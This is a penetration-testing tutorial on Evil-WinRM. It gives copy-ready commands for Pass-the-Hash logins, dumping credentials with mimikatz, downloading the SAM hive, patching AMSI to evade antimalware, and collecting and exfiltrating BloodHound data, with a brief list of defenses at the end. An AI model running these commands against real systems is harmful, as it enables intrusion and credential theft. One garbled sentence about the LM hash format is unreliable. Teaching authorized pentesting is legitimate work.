Ethical Hacking #evil-winrm#winrm#windows-pentesting

Evil-WinRM: Windows Remote Management for Pentesters

Learn how to use Evil-WinRM for Windows remote management pentesting — authentication methods, file transfers, script loading, and bypass techniques.

May 24, 2026 7 min read

Evil-WinRM is the ultimate WinRM (Windows Remote Management) shell for penetration testing. While Microsoft’s WinRM is designed for legitimate remote administration of Windows systems, Evil-WinRM wraps this protocol with attacker-friendly features: Pass-the-Hash authentication, automatic script loading, SSL support, file upload/download, and built-in PowerShell tools for common post-exploitation tasks.

If you have valid credentials (or a hash) and port 5985 or 5986 is open, Evil-WinRM often provides the cleanest remote shell on a Windows target.

What is WinRM?

Windows Remote Management is Microsoft’s implementation of the WS-Management protocol. It runs on:

Port 5985 — HTTP (unencrypted)
Port 5986 — HTTPS (encrypted)

WinRM is enabled by default on Windows Server 2012 R2 and later, and is commonly found enabled on workstations in enterprise environments. It requires the target user to be a member of the Remote Management Users group or have local administrator privileges.

Installing Evil-WinRM

Evil-WinRM is a Ruby gem. Install it with:

gem install evil-winrm

Or run it from the source:

git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
gem install bundler
bundle install
ruby evil-winrm.rb --help

On Kali Linux, Evil-WinRM is preinstalled.

Basic Connection

Connect with a username and password:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd'

Flag	Description
`-i`	Target IP address
`-u`	Username
`-p`	Password
`-H`	NTLM hash (Pass-the-Hash)
`-P`	Port (default: 5985)
`-S`	Enable SSL (port 5986)
`-c`	SSL certificate path
`-k`	SSL private key path
`-s`	PowerShell scripts directory to auto-load
`-e`	Executables directory
`-r`	Kerberos realm

Pass-the-Hash Authentication

If you have dumped an NTLM hash from a previous credential dump (via Mimikatz, secretsdump, etc.), you can authenticate without knowing the plaintext password:

evil-winrm -i 192.168.1.100 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88885d6df0b16'

The format is LM_hash:NT_hash. If LM hashes are disabled (modern Windows), use 32 as for the LM portion:

evil-winrm -i 192.168.1.100 -u administrator -H ':32ed87bdb5fdc5e9cba88885d6df0b16'

SSL Connection (Port 5986)

For encrypted connections over HTTPS:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' -S

If using a custom certificate:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' -S \
  -c cert.pem -k key.pem

File Transfer

Evil-WinRM has built-in upload and download commands — no need for separate file transfer mechanisms.

Upload to Target

# From within the Evil-WinRM shell:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> upload /home/kali/tools/mimikatz.exe C:\Users\Administrator\Desktop\mimikatz.exe

Download from Target

*Evil-WinRM* PS C:\Windows\System32\config> download SAM /home/kali/loot/SAM

Files transfer through the WinRM channel, so no additional ports need to be open.

Automatic Script Loading

One of Evil-WinRM’s most powerful features is automatic PowerShell script loading. Specify a local directory containing .ps1 files with -s, and Evil-WinRM makes all functions in those scripts available in your session:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' -s /usr/share/windows-resources/powersploit/Recon/

Now you can call functions like Invoke-ShareFinder, Get-NetUser, or any PowerSploit function directly from the shell.

Load PowerView:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' \
  -s /opt/PowerSploit/Recon/

# In the shell:
*Evil-WinRM* PS C:\> Get-NetUser -SPN

Load Sharp tools (C# executables) from a directory with -e:

evil-winrm -i 192.168.1.100 -u administrator -p 'P@ssw0rd' \
  -e /opt/SharpCollection/

# In the shell:
*Evil-WinRM* PS C:\> Invoke-Binary SharpHound.exe -c All

Built-in Commands

Evil-WinRM includes several built-in commands accessible in the shell:

Command	Description
`upload <local> [remote]`	Upload a file
`download <remote> [local]`	Download a file
`services`	List Windows services
`menu`	Show available Invoke-Binary functions
`Invoke-Binary <exe>`	Execute a .NET executable in memory
`bypass-4MSI`	Attempt to patch AMSI (Antimalware Scan Interface)
`Dll-Loader`	Load a DLL from HTTP/SMB/local path

Bypassing AMSI

AMSI (Antimalware Scan Interface) blocks malicious PowerShell. Evil-WinRM includes a built-in bypass:

*Evil-WinRM* PS C:\> bypass-4MSI

This patches AMSI in the current process memory, allowing you to run PowerShell tools that would otherwise be detected.

Kerberos Authentication

For environments that require Kerberos authentication, Evil-WinRM supports it with -r:

evil-winrm -i dc01.corp.local -u administrator -r corp.local

Ensure your /etc/hosts has the DC’s hostname mapped and that your Kerberos configuration (/etc/krb5.conf) points to the correct KDC.

Common Post-Exploitation Tasks via Evil-WinRM

Once connected, you have a full PowerShell environment. Common tasks:

Enumerate Users and Groups

Get-LocalUser
Get-LocalGroupMember -Group "Administrators"
net user /domain
net group "Domain Admins" /domain

Check Current Privileges

whoami /priv
whoami /groups

Dump Credentials with Mimikatz

Upload and run Mimikatz:

*Evil-WinRM* PS C:\> upload /opt/mimikatz.exe
*Evil-WinRM* PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Or use Invoke-Mimikatz loaded from the scripts directory to run it in memory without touching disk.

Run SharpHound for BloodHound

*Evil-WinRM* PS C:\> upload /opt/SharpHound.exe
*Evil-WinRM* PS C:\> .\SharpHound.exe -c All --zipfilename bloodhound.zip
*Evil-WinRM* PS C:\> download C:\bloodhound.zip /home/kali/loot/bloodhound.zip

Discovering WinRM Targets

Find WinRM-enabled hosts during a network assessment:

# Nmap scan for WinRM ports
nmap -p 5985,5986 192.168.1.0/24 --open -oG winrm_hosts.txt

# CrackMapExec discovery
crackmapexec winrm 192.168.1.0/24

Defensive Considerations

Disable WinRM on workstations where remote management is not required
Restrict WinRM access with Windows Firewall rules to only allow connections from authorized management hosts
Use HTTPS (port 5986) with certificate-based authentication
Monitor for Event ID 169 (WinRM service started) and 4624 (logon) with logon type 3 from unexpected sources
Privileged Access Workstations (PAW) limit where privileged credentials can authenticate

Summary

Evil-WinRM transforms the WinRM protocol into a complete post-exploitation platform. Its Pass-the-Hash support, automatic PowerShell script loading, in-memory binary execution, and built-in AMSI bypass make it the preferred tool for maintaining access and moving laterally in Windows environments. Identify WinRM-enabled hosts early in your assessment, and Evil-WinRM will often give you the cleanest, most feature-rich shell on the network.

#post-exploitation #lateral-movement #windows-pentesting #winrm #evil-winrm

// related articles

ethical-hacking Impacket Python Toolkit for Windows & AD Pentesting 7 min read ethical-hacking Linux Privilege Escalation Techniques and Tools 7 min read ethical-hacking Linux Post-Exploitation Enumeration Guide 7 min read